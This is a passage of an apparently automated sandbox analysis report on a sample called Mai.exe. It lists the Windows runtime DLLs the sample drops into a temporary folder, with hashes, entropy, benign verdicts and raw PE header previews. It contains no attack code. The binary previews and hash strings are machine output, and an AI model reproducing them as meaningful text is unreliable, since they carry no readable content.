                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...Mz............" .........................................................0......h.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16808
                                                          Entropy (8bit):6.765025764551782
                                                          Encrypted:false
                                                          SSDEEP:192:W/IAuVYPvVX8rFTs0WfhWueWvcuyjS7HnhWgN7a8Whiah+Il+jX01k9z3AR0Xik3:WVBPvVXuWfhWI7HRN7mEjR9zS0PP
                                                          MD5:792C2B83BC4E0272785AA4F5F252FF07
                                                          SHA1:6868B82DF48E2315E6235989185C8E13D039A87B
                                                          SHA-256:D26D433F86223B10CCC55837C3E587FA374CD81EFC24B6959435A6770ADDBF24
                                                          SHA-512:72C99CFF7FD5A762524E19ABEE5729DC8857F3EE3C8F78587625EC74F2AD96AF7DEE03ABA54B441CDA44B04721706BED70F3AD88453A341CBB51AAC9AFD9559E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d..._............." .........................................................@......1.....`.........................................`................0...................'..............T............................................................................rdata..............................@..@.rsrc........0......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-2-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.862975499159515
                                                          Encrypted:false
                                                          SSDEEP:192:WKMWfhW0eWvcuyjS7HnhWgN7a8WhMcy/JdSh+Il+jX01k9z3ARvXdRfn8x:W9WfhWe7HRN7DcMyEjR9zSvn8x
                                                          MD5:49E3260AE3F973608F4D4701EB97EB95
                                                          SHA1:097E7D56C3514A3C7DC17A9C54A8782C6D6C0A27
                                                          SHA-256:476FBAD616E20312EFC943927ADE1A830438A6BEBB1DD1F83D2370E5343EA7AF
                                                          SHA-512:DF22CF16490FAA0DC809129CA32EAF1A16EC665F9C5411503CE0153270DE038E5D3BE1E0E49879A67043A688F6C42BDB5A9A6B3CEA43BF533EBA087E999BE653
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...m............." .........................................................0.......X....`.........................................`...L............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l2-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.946959524345588
                                                          Encrypted:false
                                                          SSDEEP:192:WrVzWfhW5eWvcuyjS7HnhWgN7a8Wh/g26WGaN4NhrJgX01k9z3An9fXPu:WrVzWfhW57HRN7qTN4tgR9zY8
                                                          MD5:7F14FD0436C066A8B40E66386CEB55D0
                                                          SHA1:288C020FB12A4D8C65ED22A364B5EB8F4126A958
                                                          SHA-256:C78EAB8E057BDDD55F998E72D8FDF5B53D9E9C8F67C8B404258E198EB2CDCF24
                                                          SHA-512:D04ADC52EE0CEED4131EB1D133BFE9A66CBC0F88900270B596116064480AFE6AE6CA42FEB0EAED54CB141987F2D7716BB2DAE947A025014D05D7AA0B0821DC50
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....'............" .........................................................0......w.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-handle-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.862911306065441
                                                          Encrypted:false
                                                          SSDEEP:192:WxWfhWmeWvcuyjS7HnhWgN7aUWhR1+Eh+Il+jX01k9z3AReXz:WxWfhWg7HRN7eEQEjR9zSeD
                                                          MD5:10F0C22C19D5BEE226845CD4380B4791
                                                          SHA1:1E976A8256508452C59310CA5987DB3027545F3D
                                                          SHA-256:154EF0BF9B9B9DAA08101E090AA9716F0FA25464C4EF5F49BC642619C7C16F0E
                                                          SHA-512:3A5D3DC6448F65E1613E1A92E74F0934DD849433CECA593E7F974310CD96BF6AD6CCC3B0CB96BDB2DCC35514BC142C48CB1FD20FEE0D8FA236999AD155FC518B
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0...........`.........................................`...`............ ...................'..............T............................................................................rdata..`...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-heap-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.815548225091973
                                                          Encrypted:false
                                                          SSDEEP:192:WUZlKWfhWieWvcuyjS7HnhWgN7a8WhwXh+Il+jX01k9z3ARxiXNk:W6lKWfhWM7HRN7J5EjR9zSw9k
                                                          MD5:405038FB22CD8F725C2867C9B4345B65
                                                          SHA1:385F0EB610FCE082B56A90F1B10346C37C19D485
                                                          SHA-256:1C1B88D403E2CDE510741A840AFA445603F76E542391547E6E4CC48958C02076
                                                          SHA-512:B52752AC5D907DC442EC7C318998FD54AD9AD659BDE4350493FE5CA95286ECEFCBBBF82D718D4BF4E813B4D20A62CD1F7BA11EE7C68C49EC39307B7746968D18
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....Bb.........." .........................................................0......[.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-interlocked-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.877222097685592
                                                          Encrypted:false
                                                          SSDEEP:192:WzWfhWceWvcuyjS7HnhWgN7a8Whkh+Il+jX01k9z3ARNXJXEmo:WzWfhWG7HRN7NEjR9zSN5XJo
                                                          MD5:AFF9165CFF0FB1E49C64B9E1EAEFDD86
                                                          SHA1:CDEF56AB5734D10A08BC373C843ABC144FE782CB
                                                          SHA-256:159ECB50F14E3C247FAEC480A3E6E0CF498EC13039C988F962280187CEE1391D
                                                          SHA-512:64DDF8965DEFAF5E5AE336D37BDB3868538638BAD927E2E76E06ACE51A2BCA60AEFAAB18C300BB7E705F470A937AD978EDD0338091AD6BCC45564C41071EEB40
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-libraryloader-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.819759709049553
                                                          Encrypted:false
                                                          SSDEEP:192:WivuBL3BBLJWfhWGeWvcuyjS7HnhWgN7a8WhfZVh+Il+jX01k9z3ARLFXWk:WivuBL3BrWfhWA7HRN7cZLEjR9zSZGk
                                                          MD5:4334F1A7B180998473DC828D9A31E736
                                                          SHA1:4C0C14B5C52AB5CF43A170364C4EB20AFC9B5DD4
                                                          SHA-256:820E3ACD26AD7A6177E732019492B33342BC9200FC3C0AF812EBD41FB4F376CB
                                                          SHA-512:7F2A12F9D41F3C55C4AFF2C75EB6F327D9434269EBFF3FBCC706D4961DA10530C069720E81B1573FAF919411F929304E4AAF2159205CF9A434B8833EEA867AA9
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-localization-l1-2-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15776
                                                          Entropy (8bit):6.867557538513122
                                                          Encrypted:false
                                                          SSDEEP:384:WbOMw3zdp3bwjGjue9/0jCRrndbWsWfhWU7HRN7ApUad+JR9zuszu:yOMwBprwjGjue9/0jCRrndbGDVadk9zk
                                                          MD5:71457FD15DE9E0B3AD83B4656CAD2870
                                                          SHA1:C9C2CAF4F9E87D32A93A52508561B4595617F09F
                                                          SHA-256:DB970725B36CC78EF2E756FF4B42DB7B5B771BFD9D106486322CF037115BD911
                                                          SHA-512:A10FCF1D7637EFFFF0AE3E3B4291D54CC7444D985491E82B3F4E559FBB0DBB3B6231A8C689FF240A5036A7ACAE47421CDA58AAA6938374D4B84893CCE0077BC8
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....V............" .........................................................0............`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-memory-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.854527300629819
                                                          Encrypted:false
                                                          SSDEEP:192:W/qWfhW0eWvcuyjS7HnhWgN7a8Wh+Yq21eX01k9z3ABfNB/xqw:W/qWfhWe7HRN7Ql8R9zmfNB0w
                                                          MD5:D39FBBEAC429109849EC7E0DC1EC6B90
                                                          SHA1:2825C7ABA7F3E88F7B3D3BC651BBC4772BB44AD0
                                                          SHA-256:AEEC3D48068137870E6E40BAD9C9F38377AA06C6EA1AC288E9E02AF9E8C28E6B
                                                          SHA-512:B4197A4D19535E20ED2AFF4F83ACED44E56ABBB99CE64E2F257D7F9B13882CBDB16D8D864F4923499241B8F7D504D78FF93F22B95F7B02996B15BB3DA1A0EF42
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....2..........." .........................................................0............`.........................................`...l............ ...................'..............T............................................................................rdata..l...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-namedpipe-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.955574425170444
                                                          Encrypted:false
                                                          SSDEEP:192:WUWfhWyeWvcuyjS7HnhWgN7a8WhYw0mh+Il+jX01k9z3ARj4XGAzux:WUWfhWc7HRN7GXEjR9zSk2AzA
                                                          MD5:0E5CD808E9F407E75F98BBB602A8DF48
                                                          SHA1:285E1295A1CF91EF2306BE5392190D8217B7A331
                                                          SHA-256:1846947C10B57876239D8CB74923902454F50B347385277F5313D2A6A4E05A96
                                                          SHA-512:7D8E35CABE7C3B963E6031CD73DC5AD5EDF8B227DF735888B28D8EFB5744B531F0C84130E47624E4FEA8EF700EABDE20A4E2290A1688A6ACFFB6A09CA20D7085
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....5..........." .........................................................0......z.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processenvironment-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.824261156098003
                                                          Encrypted:false
                                                          SSDEEP:192:WAWWfhWZeWvcuyjS7HnhWgN7a8Wh0Dq21eX01k9z3ABfNBd5++x:WAWWfhWZ7HRN7rDl8R9zmfNBf+k
                                                          MD5:CC52CD91B1CBD20725080F1A5C215FCC
                                                          SHA1:2CE6A32A5BD6FA9096352D3D73E7B19B98E0CC49
                                                          SHA-256:990DC7898FD7B442D50BC88FEC624290D69F96030A1256385391B05658952508
                                                          SHA-512:D262F62ADDE8A3D265650A4B56C866BDD2B660001FB2CA679D48EE389254E9FFA6CE9D69F2AAA619D22A155A5523DCE5F7CFDD7638C0E9DF1FE524B09520D5A3
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d.....h..........." .........................................................0......8.....`.........................................`...H............ ...................'..............T............................................................................rdata..T...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15272
                                                          Entropy (8bit):6.869458023567228
                                                          Encrypted:false
                                                          SSDEEP:384:WyWXk1JzNcKSIHWfhWH7HRN7pEjR9zSgX:BbcKStkpEF9zZ
                                                          MD5:2DD711EA0F97CB7C5AB98AE6F57B9439
                                                          SHA1:CBA11E3EEBE7B3D007EB16362785F5D1D1251ACD
                                                          SHA-256:A958FD20C06C90112E9E720047D84531B2BD0C77174660DC7E1F093A2ED3CC68
                                                          SHA-512:D8D39CA07FDFED6A4E5686EAE766022941C19BFBCEB5972EDD109B453FD130B627E3E2880F8580A8A41601493D0C800E64A76E8590070AA13C1ABD550BD1A1BA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....,-a.........." .........................................................0......$.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-1.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.883994552966322
                                                          Encrypted:false
                                                          SSDEEP:192:WKtyDfIe9jWfhWyReWvcuyjS7HnhWgN7a8WhXO/h+Il+jX01k9z3AR/iXiz:WKtyDfIe9jWfhWyR7HRN7Y6EjR9zSqe
                                                          MD5:E93816C04327730D41224E7A1BA6DC51
                                                          SHA1:3F83B9FC6291146E58AFCE5B5447CD6D2F32F749
                                                          SHA-256:CA06CCF12927CA52D8827B3A36B23B6389C4C6D4706345E2D70B895B79FF2EC8
                                                          SHA-512:BEAAB5A12BFC4498CDF67D8B560EF0B0E2451C5F4634B6C5780A857666FD14F8A379F42E38BE1BEEFA1C3578B2DF913D901B271719AC6794BFAAB0731BB77BCA
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...I............." .........................................................0......V.....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-profile-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12712
                                                          Entropy (8bit):6.988937791517322
                                                          Encrypted:false
                                                          SSDEEP:192:W7AaVWfhWdieWvcuyjS7HnhWgN7a8Whvrq21eX01k9z3ABfNBo3:W7AIWfhWdM7HRN7Ul8R9zmfNB0
                                                          MD5:051847E7AA7A40A1B081FF4B79410B5B
                                                          SHA1:4CA24E1DA7C5BB0F2E9F5F8CE98BE744EA38309E
                                                          SHA-256:752542F72AF04B3837939F0113BFCB99858E86698998398B6CD0E4E5C3182FD5
                                                          SHA-512:1BFB96D15DF1CD3DCEFC933AECA3CE59BEF90E4575A66EAAB92386F8E93652906626308886DD9B82C0863D1544331BBF99BE8E781FA71D8C4C1F5FFF294056DC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...xc.].........." .........................................................0......Eg....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.826511666056111
                                                          Encrypted:false
                                                          SSDEEP:192:WLGeVxWfhWkeWvcuyjS7HnhWgN7a8WhZch+Il+jX01k9z3ARLXX:WLGeVxWfhWO7HRN7HEjR9zSLn
                                                          MD5:2AA1F0C20DFB4586B28FAF2AA16B7B00
                                                          SHA1:3C4E9C8FCA6F24891430A29B155876A41F91F937
                                                          SHA-256:D2C9EE6B1698DFE99465AF4B7358A2F4C199C907A6001110EDBEA2D71B63CD3F
                                                          SHA-512:AE05338075972E258BCF1465E444C0A267AD6F03FBB499F653D9D63422A59AC28F2CB83EC25F1181699E59ECBAAC33996883E0B998CBADE1CC011BC166D126D0
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...L.\w.........." .........................................................0...........`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-string-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.908697555398443
                                                          Encrypted:false
                                                          SSDEEP:192:WvyMv9WfhW0FCeWvcuyjS7HnhWgN7a8Wh/kkQOh+Il+jX01k9z3ARpXZE:WvyMv9WfhWas7HRN7x0EjR9zSppE
                                                          MD5:6E5DA9819BD53DCB55ABDE1DA67F3493
                                                          SHA1:8562859EBF3CE95F7ECB4E2C785F43AD7AAAF151
                                                          SHA-256:30DC0DEB0FAF0434732F2158AD24F2199DEF8DD04520B9DAABBC5F0B3B6DDF40
                                                          SHA-512:75EB227CA60FF8E873DAC7FA3316B476B967069E8F0AC31469B2DE5A9B21044DB004353FEBF2B53069392BE10A8BF40563BB5D6D4BE774D37D12CF6FBECED175
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................." .........................................................0.......v....`.........................................`................ ...................'..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):15272
                                                          Entropy (8bit):6.791010772317001
                                                          Encrypted:false
                                                          SSDEEP:384:WWdv3V0dfpkXc0vVaCWfhWU7HRN7wTN4tgR9zYYB:/dv3VqpkXc0vVabjwTNx9zlB
                                                          MD5:F378455FB81488F5BFD3617E3C5A75C0
                                                          SHA1:312FA1343498E99565B1FBF92E6E1E05351CBC99
                                                          SHA-256:91E50F94A951AA4E48A9059AD222BBE132B02E83D4A7DF94A35EA73248E84800
                                                          SHA-512:11D80D4F58DA3827A317A3C1ED501432050E123EB992ED58C7765C68DDD2FC49B04398149E73FDB9FB3AA4494B440333AA26861B796E7AE8C7AD730F4FAF99F7
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0............`.........................................`...X............ ...................'..............T............................................................................rdata..X...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-2-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.926691835908429
                                                          Encrypted:false
                                                          SSDEEP:192:WttZ36WfhWBaeWvcuyjS7HnhWgN7a8WhEaNh+Il+jX01k9z3ARPXnge:WttZ36WfhWBk7HRN7LMEjR9zSP3z
                                                          MD5:5E393142274D7589AD3DF926A529228C
                                                          SHA1:B9CA32FCC7959CB6342A1165B681AD4589C83991
                                                          SHA-256:219CC445C1AD44F109219A3BB6900AB965CB6357504FC8110433B14F6A9B57BE
                                                          SHA-512:5EB31BE9BCE51A475C18267D89EE7B045AF37B9F0722BAAA85764114326C7A8D0A1662135E102D7AC074C24A6035232A527FC8745139A26CB62F33913ACE3178
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d................" .........................................................0......C.....`.........................................`...x............ ...................'..............T............................................................................rdata..x...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-sysinfo-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):14248
                                                          Entropy (8bit):6.829698799977648
                                                          Encrypted:false
                                                          SSDEEP:192:WWKIMFqnWfhWpeWvcuyjS7HnhWgN7a8Wh8oSh+Il+jX01k9z3ARMiXxT8:WWTnWfhWp7HRN7poqEjR9zSXm
                                                          MD5:7B997BD96CB7FA92DEE640D5030F8BEA
                                                          SHA1:EE258D5F6731778363AA030A6BC372CA9A34383C
                                                          SHA-256:4BCD366EAF0BDE99B472FA2BF4E0DDA1D860B3F404019FB41BBB8AD3A6D4D8F2
                                                          SHA-512:92B9F4DD0B8CC66A92553418A1E18BBBEE775F4051CD49AF20505151BE20B41DB11D42C7F2436A6FA57E4C55F55A0519A1960E378F216BA4D7801E2EFB859B2A
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d...hI$..........." .........................................................0............`.........................................`...H............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-timezone-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13736
                                                          Entropy (8bit):6.908054226003342
                                                          Encrypted:false
                                                          SSDEEP:192:W2HtoXeOWfhWteWvcuyjS7HnhWgN7a8WhPh+Il+jX01k9z3ARiXC:WmOWfhWd7HRN7IEjR9zSiS
                                                          MD5:ACF40D5E6799231CF7E4026BAD0C50A0
                                                          SHA1:8F0395B7E7D2AAC02130F47B23B50D1EAB87466B
                                                          SHA-256:64B5B95FE56B6DF4C2D47D771BEC32BD89267605DF736E08C1249B802D6D48D1
                                                          SHA-512:F66A61E89231B6DC95B26D97F5647DA42400BC809F70789B9AFC00A42B94EA3487913860B69A1B0EE59ED5EB62C3A0CADE9E21F95DA35FDD42D8CE51C5507632
                                                          Malicious:false
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......WU...4e..4e..4e.vRe..4e.vRa..4e.vR...4e.vRg..4e.Rich.4e.................PE..d....\]\.........." .........................................................0......Sp....`.........................................`...H............ ...................'..............T............................................................................rdata..H...........................@..@.rsrc........ ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-util-l1-1-0.dll

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Mai.exe
                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):13224
                                                          Entropy (8bit):6.845813488265057
                                                          Encrypted:false
                                                          SSDEEP:192:WfRWWfhWEeWvcuyjS7HnhWgN7a8WhAq21eX01k9z3ABfNBhKD5lx:WfRWWfhWu7HRN7rl8R9zmfNBUD5lx
                                                          MD5:7A75BC355CA9F0995C2C27977FA8067E
                                                          SHA1:1C98833FD87F903B31D295F83754BCA0F9792024
                                                          SHA-256:52226DC5F1E8CD6A22C6A30406ED478E020AC8E3871A1A0C097EB56C97467870
